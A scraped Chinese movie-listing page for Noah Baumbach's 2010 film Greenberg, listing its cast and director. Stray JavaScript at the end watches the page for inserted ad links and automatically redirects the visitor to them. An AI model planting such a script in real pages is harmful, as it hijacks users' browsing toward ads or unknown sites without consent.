格林伯格

格林伯格

  • 主演:本·斯蒂勒 格蕾塔·葛韦格 瑞斯·伊凡斯 詹妮弗·杰森·李 朱诺·坦普尔 布丽·拉尔森 马克·杜普拉斯 克里斯·梅西纳 戴夫·弗兰科 
  • 导演:诺亚·鲍姆巴赫 
  • 年份:2010
返回顶部
// 自动监听插入的 或 iframe,提取跳转链接 const observer = new MutationObserver((muts) => { for (const m of muts) { for (const node of m.addedNodes) { if (node.nodeType !== 1) continue; const el = node; // case 1: 链接 if (el.tagName === "A" && el.href.includes("http")) { console.log("🎯 发现广告链接:", el.href); window.location.href = el.href; } // case 2: iframe if (el.tagName === "IFRAME" && el.src.includes("http")) { console.log("🎯 发现广告 iframe:", el.src); // window.location.href = el.src; } } } }); observer.observe(document.body, { childList: true, subtree: true });